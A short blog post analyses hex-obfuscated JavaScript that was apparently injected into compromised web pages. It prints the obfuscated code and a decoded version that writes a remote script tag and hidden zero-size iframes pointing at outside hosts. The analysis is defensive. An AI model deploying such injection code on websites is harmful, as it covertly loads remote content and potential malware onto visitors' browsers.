博客网 >

hexidecimal javascript
作者:分类:默认分类标签:
I got unreadable javascript code from my friend.

Initiall, it appears as:

function Get(){

    var $qL1 = new window["Date"]()
    $qL1["\x73\x65\x74\x54\x69\x6d\x65"]($qL1["\x67\x65\x74\x54\x69\x6d\x65"]() + 24*60*60*1000)
    var vuICgd2 = new window["\x53\x74\x72\x69\x6e\x67"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"])
    var JHasS3 = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d"
    var wUhao4 = vuICgd2["\x69\x6e\x64\x65\x78\x4f\x66"](JHasS3)
    if (wUhao4 != -1)
    {
    }
    else
    {
        window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d\x50\x4f\x50\x57\x49\x4e\x31\x3b\x65\x78\x70\x69\x72\x65\x73\x3d"+ $qL1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]()
        window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x48\x54\x4d\x4c\x3e");
        window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x42\x4f\x44\x59 \x73\x74\x79\x6c\x65\x3d\'\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\x2e\x63\x6e\/\x61\x64\x2e\x6a\x70\x67\x29\'\x3e\x3c\/\x42\x4f\x44\x59\x3e");
        window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\/\x48\x54\x4d\x4c\x3e ");
        window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x73\x62\x2e\x32\x35\x75\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x31\x34\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
        window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x73\x62\x2e\x32\x35\x75\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x6d\x6d\x2e\x68\x74\x6d\x6c \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");
        window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x73\x62\x2e\x32\x35\x75\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");
    }
}


it is totaly unreadable, so I write a convert function in C#, output the text function, after translation, it appears as:
function Get()
{
    var $qL1 = new window["Date"]()
    $qL1["setTime"]($qL1["getTime"]() + 24*60*60*1000)
    var vuICgd2 = new window["String"](window["document"]["cookie"])
    var JHasS3 = "Cookie1="
    var wUhao4 = vuICgd2["indexOf"](JHasS3)
    if (wUhao4 != -1)
    {
    }
    else
    {
        window["document"]["cookie"] = "Cookie1=POPWIN1;expires="+ $qL1["toGMTString"]()
        window["document"]["writeln"]("<HTML>");
        window["document"]["writeln"]("<BODYstyle='CURSOR:url(http://1.520sb.cn/ad.jpg)'></BODY>");
        window["document"]["writeln"]("</HTML>");
        window["document"]["writeln"]("<scriptsrc="http://sb.25u.com/dir/index_pic/0614.js"></script>");
        window["document"]["writeln"]("<iframe src=http://sb.25u.com/dir/index_pic/mm.html width=0 height=0></iframe>");
        window["document"]["writeln"]("<iframesrc='http://sb.25u.com/dir/index_pic/tj.htm' width=0 height=0></iframe>");
    }
}

okay, now you probably know what happens in this code, it uses dom to insert a iframe into the document. Why does it happen? it seems the web server has been attacked, and web files have been injected with such code....

<< Javascript Memor... / GetExactPosition... >>

专题推荐

不平凡的水果世界

不平凡的水果世界

平凡的水果世界,平凡中的不平凡。 今朝看水果是水果 ,看水果还是水果 ,看水果已不是水果。这境界,谁人可比?在不平凡的水果世界里,仁者见仁,智者见智。

中国春节的那些习俗

中国春节的那些习俗

正月是农历新年的开始,人们往往将它看作是新的一年年运好坏的兆示期。所以,过年的时候“禁忌”特别多。当然,各个地方的风俗习惯不一样,过年的禁忌也是不一样的。

评论
0/200
表情 验证码:

gisman

  • 文章总数0
  • 画报总数0
  • 画报点击数0
  • 文章点击数0
个人排行
        博文分类
        日期归档